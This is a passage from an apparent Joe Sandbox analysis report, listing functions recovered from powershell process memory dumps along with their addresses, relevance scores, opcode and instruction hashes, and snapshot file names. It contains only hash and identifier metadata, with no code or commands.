                                                                                • Snapshot File: hcaresult_4_2_7ffd9b760000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 457a9834b5b4e1040173fe58aea43af4f1963528c0036f97e6c2c0b312c97c50
                                                                                • Instruction ID: 88c1175e3839abef4788e2c68e145ddfc8c44225e14ba58ae3878b9e0b3ec97f
                                                                                • Opcode Fuzzy Hash: 457a9834b5b4e1040173fe58aea43af4f1963528c0036f97e6c2c0b312c97c50
                                                                                • Instruction Fuzzy Hash: 24413B7190DB884FDB18DB5C9C1A6B8BBE0FB59310F04426FD489C3292CA60B915CBC2
                                                                                Function 00007FFD9B64ED40 Relevance: .1, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1896806368.00007FFD9B64D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B64D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b64d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e1aa70149da7a8cede59bc405483edd49d288d2d32d01640cb8feacb1b76e3f8
                                                                                • Instruction ID: 8d8f6932e3b14f37c3e6b531ae8df1611b6eb20b7e7cf7d6da0e50ae52307644
                                                                                • Opcode Fuzzy Hash: e1aa70149da7a8cede59bc405483edd49d288d2d32d01640cb8feacb1b76e3f8
                                                                                • Instruction Fuzzy Hash: C941163050EBC44FE76A8B289855A623FF1EF56220B1A01DFD0D8CB1A3D625A846C792
                                                                                Function 00007FFD9B76A49C Relevance: .1, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1897454819.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b760000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3802d984b7206b62bfe8beb95857bab29306b05b680b6c888c49f84920b24b44
                                                                                • Instruction ID: a3708fef269cbf5d6ab1016489e289156196a848790a56acb8cb91e43ac69757
                                                                                • Opcode Fuzzy Hash: 3802d984b7206b62bfe8beb95857bab29306b05b680b6c888c49f84920b24b44
                                                                                • Instruction Fuzzy Hash: F8212B3190C74C4FDB59DBAC9C4A7E97FE0EB96321F04426BD048C3166DA74A40ACB92
                                                                                Function 00007FFD9B7633B5 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1897454819.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b760000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                • Instruction ID: 606a3e1d64f3f184d29538b399a082f5dcd9ff4372c83a7c912515896dbd522b
                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                • Instruction Fuzzy Hash: 2301677121CB0C8FD748EF0CE451AA5B7E0FB95365F10056DE58AC36A5DA36E882CB46
                                                                                Function 00007FFD9B76A0FB Relevance: .0, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1897454819.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b760000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 136a308d330467f8770d40a1de29c747f862a7cd1f0e7302be07a9f2866b59de
                                                                                • Instruction ID: fdb6801caa94a90789e867c6bc4b63866dae9cf7393c9b77c878da2e059b59a0
                                                                                • Opcode Fuzzy Hash: 136a308d330467f8770d40a1de29c747f862a7cd1f0e7302be07a9f2866b59de
                                                                                • Instruction Fuzzy Hash: 9AF02B36A1AB8C4FDB56DF2CD8691E47FA0FF65201B0501BBD548C7171EB205948C7C2
                                                                                Function 00007FFD9B83414D Relevance: .0, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1898062380.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b830000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 626bae229b1ac96fe4b1d457ead44e4f7f0f87adf08fd81874a652e2345d356c
                                                                                • Instruction ID: c12ddadf81d5a28fd2ee6c8f2fb35af0f4db4f04668ffd78b5b796bbdd503c51
                                                                                • Opcode Fuzzy Hash: 626bae229b1ac96fe4b1d457ead44e4f7f0f87adf08fd81874a652e2345d356c
                                                                                • Instruction Fuzzy Hash: B8F0B432B0D9094FDB68EB4CE4518D873E0EF5832071500BAE06DC71B3CA25EC40C740
                                                                                Function 00007FFD9B834400 Relevance: .0, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1898062380.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b830000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f79d10961b99d142bcddb17df9f177fecb69bcb51716edbddbcf320f68a5da64
                                                                                • Instruction ID: 85ba145f0950cb8959a313e2771051e1e081e84e099dc0cb251adb9e9632afb7
                                                                                • Opcode Fuzzy Hash: f79d10961b99d142bcddb17df9f177fecb69bcb51716edbddbcf320f68a5da64
                                                                                • Instruction Fuzzy Hash: 9EF0BE32A0E5498FDBA4EB4CE0608A8B7E0FF0832071600BAE05DC71A3DA25EC50C780
                                                                                Function 00007FFD9B8341D1 Relevance: .0, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1898062380.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b830000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                • Instruction ID: 585ec3caf0cf4cdf2a5ccd245456338458df09984bb726fb38306844d3d01381
                                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                • Instruction Fuzzy Hash: 32E01A31B0C8088FDAB8DB4CE0519AD73E1EB9832171601BBD14EC7671CA26ED518B80

                                                                                Non-executed Functions

                                                                                Function 00007FFD9B768BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1897454819.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b760000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                                • API String ID: 0-2388461625
                                                                                • Opcode ID: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                                                                • Instruction ID: 50a0c9028fc9e5b9b9ba953ad775e5eb324d4aa13dc9b7a34a0055a2eab47c01
                                                                                • Opcode Fuzzy Hash: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                                                                • Instruction Fuzzy Hash: A521C577A445154EC30537BCBD619EC6B82DB6437834501F3E229CF593DE14648B8A82

                                                                                Executed Functions

                                                                                Function 00007FFD9B78644D Relevance: .7, Instructions: 722COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2049153599.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b780000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2cc5f0506dd5f8bf2e009ece2aaa35553f542fb1a6d164c3181e89e80ec2a198
                                                                                • Instruction ID: 5b9e8ae094c58dbbd34db1c93395243edf00d7c290c4d26df5821ce8410537ce
                                                                                • Opcode Fuzzy Hash: 2cc5f0506dd5f8bf2e009ece2aaa35553f542fb1a6d164c3181e89e80ec2a198
                                                                                • Instruction Fuzzy Hash: BED17230A19A4D8FDF94DF5CC4A5AAD7BE1FF68301F1542AAD40DD72A6CA34E841CB81
                                                                                Function 00007FFD9B856605 Relevance: .4, Instructions: 435COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2050082706.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b850000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 78ea7e431539aaa5db3960eea2438f0d6dfff0ca1051c18bab030548fbc36397
                                                                                • Instruction ID: d0f5473b7b6fa73847db32766338757e49f9deb7e36dd6ad61271514b8918883
                                                                                • Opcode Fuzzy Hash: 78ea7e431539aaa5db3960eea2438f0d6dfff0ca1051c18bab030548fbc36397
                                                                                • Instruction Fuzzy Hash: 1DD16872B0EACE4FEBA5ABA888745B57BE0EF19314B1901FED45DC70E3D918A905C341
                                                                                Function 00007FFD9B789728 Relevance: .1, Instructions: 146COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2049153599.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b780000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2af7d997e635880ae3a297bf57633e5f15551139487fe18540edc04d6382d3c3
                                                                                • Instruction ID: f941a64aacfa2961a32e17452708f027130b54ea0a2a032fded610488daa5d47
                                                                                • Opcode Fuzzy Hash: 2af7d997e635880ae3a297bf57633e5f15551139487fe18540edc04d6382d3c3
                                                                                • Instruction Fuzzy Hash: 23413B71A0DF884FDB189B5C984A6B87BE1FF95311F40426FE089932A2DA30A915C7C6
                                                                                Function 00007FFD9B789FF3 Relevance: .1, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2049153599.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b780000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 57fb526cfa4b2d9254724d511b118648dafc991178be07007c70f28fe4ed6157
                                                                                • Instruction ID: 2bfe0aa9a401e604a75a430f2405aa4527b870516ef34c438505314bd4cd01e9
                                                                                • Opcode Fuzzy Hash: 57fb526cfa4b2d9254724d511b118648dafc991178be07007c70f28fe4ed6157
                                                                                • Instruction Fuzzy Hash: 93416037F0BF9A0FE711AA5C9CF64E93B90EF51B56B0902B7D0D8460B3FD1525464682
                                                                                Function 00007FFD9B66F360 Relevance: .1, Instructions: 126COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2048175237.00007FFD9B66D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B66D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b66d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 71542f236ee339ae3f1c5d1e0cae03035fdba113791604987349a4dfd4650f23
                                                                                • Instruction ID: 148184a966b9e00a9aae6de7d082b36f61e74464d95ffe94e3af3c38b2617a25
                                                                                • Opcode Fuzzy Hash: 71542f236ee339ae3f1c5d1e0cae03035fdba113791604987349a4dfd4650f23
                                                                                • Instruction Fuzzy Hash: AB41287140EBC49FE7568B2D98519523FF0EF56320B1901DFD088CB1A3D625B846C792
                                                                                Function 00007FFD9B78A47C Relevance: .1, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2049153599.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b780000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f157e5f38b1ea34307152aebb80ba2dcfb54a77c18e4870f34aa13fabdb0b491
                                                                                • Instruction ID: eb18394ab6a93c983f40cec415bf355752af49f41fe13729cc3f49e704e12583
                                                                                • Opcode Fuzzy Hash: f157e5f38b1ea34307152aebb80ba2dcfb54a77c18e4870f34aa13fabdb0b491
                                                                                • Instruction Fuzzy Hash: C821283090CB4C8FDB59DBAC988A7E97FF0EB96321F04426BD44CC3162DA749416CB92
                                                                                Function 00007FFD9B7833B5 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2049153599.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b780000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                • Instruction ID: b0756f8a4c7956ffab13a62e7a7c7099be051ef85b7a7f41cfbc275390928040
                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                • Instruction Fuzzy Hash: DD01677121CB0C4FD748EF0CE451AA5B7E0FB95365F10056DE58AC36A5DA36E882CB45
                                                                                Function 00007FFD9B85414D Relevance: .0, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2050082706.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b850000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d2537c7df8b8d21297c976f5652b2036572d8a36a17f5878886c3849f21a797d
                                                                                • Instruction ID: b0b0a8846fddc1a160361d49569fdefee22e9c3a0f37323819a51afb9de8554d
                                                                                • Opcode Fuzzy Hash: d2537c7df8b8d21297c976f5652b2036572d8a36a17f5878886c3849f21a797d
                                                                                • Instruction Fuzzy Hash: A6F09A32B4E5098FD769EB8CE4518E873E0EF58320B2600FAE06DC71B7CA25EC408740
                                                                                Function 00007FFD9B854400 Relevance: .0, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2050082706.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b850000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9c795ca601e37e9e83fd1109dc9506216d0f000ad8760f10953b6ca8e040aa1a
                                                                                • Instruction ID: 1011cd16b8842df13856c2af93c7f7d567d8053b22b232fc184a05a81038b045
                                                                                • Opcode Fuzzy Hash: 9c795ca601e37e9e83fd1109dc9506216d0f000ad8760f10953b6ca8e040aa1a
                                                                                • Instruction Fuzzy Hash: 62F0BE32A4E5498FD768EB8CE0608A877E0FF0832072600FAE05DCB0A7DA25BC40C740
                                                                                Function 00007FFD9B8541D1 Relevance: .0, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2050082706.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b850000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                • Instruction ID: 0e77a6cbb02ba194589bce14a9dc6363ce941337e6a6b016bcb11bd49ac142eb
                                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                • Instruction Fuzzy Hash: 89E01A31B4C8088FDB78DB8CE0519A973E1EB98321B5601BBD14EC7575CA22ED518B80

                                                                                Non-executed Functions

                                                                                Function 00007FFD9B788BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2049153599.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b780000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: L_^6$L_^<$L_^F$L_^I$L_^J
                                                                                • API String ID: 0-1031638419
                                                                                • Opcode ID: 1a466d4f57ca421675876869b523df085967c141f9b1e0207efbd2f5b90dc140
                                                                                • Instruction ID: 9c609324f68ff23724be791fbbf1dce330fb4b8e09d9a9f09f36dffb33c5ab2a
                                                                                • Opcode Fuzzy Hash: 1a466d4f57ca421675876869b523df085967c141f9b1e0207efbd2f5b90dc140
                                                                                • Instruction Fuzzy Hash: 1321247B7085165ED30677AEB8119EC7381DBE427634991B3E368CB553DF14A08B8AD0
                                                                                Function 00007FFD9B788995 Relevance: 5.1, Strings: 4, Instructions: 134COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2049153599.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b780000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: L_^$L_^$L_^$L_^
                                                                                • API String ID: 0-2357752022
                                                                                • Opcode ID: 44c4db2fa3de71efa4649a0ca1cc1d65f2b15660ba8b41059d166e8b97c168c4
                                                                                • Instruction ID: 237cbf52692ae0aefbfce1bcb4f93f9c69227edd708745172dec7fc7af4af6f8
                                                                                • Opcode Fuzzy Hash: 44c4db2fa3de71efa4649a0ca1cc1d65f2b15660ba8b41059d166e8b97c168c4
                                                                                • Instruction Fuzzy Hash: D44174A2B0FBC61FF36646698CA90457F60FF52A5870A53F7C0D48B0F3ED29190B8652

                                                                                Executed Functions

                                                                                Function 00007FFD9B846605 Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2251027426.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: X7`
                                                                                • API String ID: 0-1347043371
                                                                                • Opcode ID: da034092b266f24d9a0fea789ef1d5a64e32537aa8627cbcc96d7c038aafe8a3
                                                                                • Instruction ID: dbee87347349e3848d195320aa231ea6db307f6aa3bafa5f86a37616ac84518e
                                                                                • Opcode Fuzzy Hash: da034092b266f24d9a0fea789ef1d5a64e32537aa8627cbcc96d7c038aafe8a3
                                                                                • Instruction Fuzzy Hash: 6FD155B2B0EB8E4FEBA5AB6848745B57BE2EF19314B1901FED45CC70E3D918A805C341
                                                                                Function 00007FFD9B77644D Relevance: .7, Instructions: 720COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2249805955.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c9253e79730304b162afe365478948707877d8262c03d351a507f9a73086ace2
                                                                                • Instruction ID: 502d0898ca71ff8def96d2e3b543c5cae7588d200d8f52a63d7a13232becee29
                                                                                • Opcode Fuzzy Hash: c9253e79730304b162afe365478948707877d8262c03d351a507f9a73086ace2
                                                                                • Instruction Fuzzy Hash: 20D16231A18A4D8FDF94DF5CC4A5AAD7BE1FF68300F1542AAD409D72A9CB74E841CB81
                                                                                Function 00007FFD9B779750 Relevance: .1, Instructions: 146COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2249805955.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6b0cdfd9595e82fd4cd9cf88f8f5513bd22ad3aa30512f0cb9d87b5ac3890add
                                                                                • Instruction ID: 533517b21f00d11fb32938a8be28c474d5221e97a9f8b3052c43e8f7b3bc1622
                                                                                • Opcode Fuzzy Hash: 6b0cdfd9595e82fd4cd9cf88f8f5513bd22ad3aa30512f0cb9d87b5ac3890add
                                                                                • Instruction Fuzzy Hash: 4C41297190EB885FDB189F5C9C4A6B97BE0FB55310F04426FE099932A2CA64A815CBC6
                                                                                Function 00007FFD9B65EB80 Relevance: .1, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2248479312.00007FFD9B65D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B65D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b65d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aef2a57f0a7e529a3ed8c6ccb830e5e2c283cc53a4b04c0d76c29c0eeda6f59c
                                                                                • Instruction ID: 0f398a16fbbd4ec32f1552d3cffea2e18a15cd128548cbf1bdd6f872f82e68ae
                                                                                • Opcode Fuzzy Hash: aef2a57f0a7e529a3ed8c6ccb830e5e2c283cc53a4b04c0d76c29c0eeda6f59c
                                                                                • Instruction Fuzzy Hash: 7B415A7180EBC84FEB668B7898519623FF0EF52321B1601DFD0C9CB1A3D625B846C792
                                                                                Function 00007FFD9B77A49C Relevance: .1, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2249805955.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 43d7513a7c7cabace86a91835aba9adfecfd485a66d02e3bf8a8306cb777e677
                                                                                • Instruction ID: 0bd571f0c1bd943128652d8c8018b4d941fc06b0110b569e8c02b54ce5cd0a20
                                                                                • Opcode Fuzzy Hash: 43d7513a7c7cabace86a91835aba9adfecfd485a66d02e3bf8a8306cb777e677
                                                                                • Instruction Fuzzy Hash: 00212B3190C74C4FEB59DBAC9C4A7E97FE0EB56321F04426FD048C3162DA74A815CB91
                                                                                Function 00007FFD9B7733B5 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2249805955.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                • Instruction ID: a855e341a462274d49eabc0e16f816d0981cb0317f9cc1d8a1f2f3ba92cc05e1
                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                • Instruction Fuzzy Hash: EA01A73020CB0C4FD748EF0CE051AA5B3E0FB85320F10056DE58EC36A1DA32E882CB41
                                                                                Function 00007FFD9B84414D Relevance: .0, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2251027426.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
                                                                                • Instruction ID: 3df613910222723f5189684d85f77e1752c27ae1f4e7343bebd7535f50083bae
                                                                                • Opcode Fuzzy Hash: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
                                                                                • Instruction Fuzzy Hash: DEF09A32B0E9098FD769EB4CE4518A873E1EF5932072600BAE06DC71B3CA25EC408740
                                                                                Function 00007FFD9B844400 Relevance: .0, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2251027426.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
                                                                                • Instruction ID: e8015127403ef007c02cc68ef27310f3601c016a9255f4d2daad8dfb329b25f2
                                                                                • Opcode Fuzzy Hash: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
                                                                                • Instruction Fuzzy Hash: 3CF0BE32B0E5498FD764EB4CE0608A877E0FF0832072600BAE159C74A3DA25AC40C740
                                                                                Function 00007FFD9B8441D1 Relevance: .0, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2251027426.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                • Instruction ID: cdab32a5d8804fbfaa35fd86f79cc5e0cbc80fc2a89f23c2f1827656015b2d24
                                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
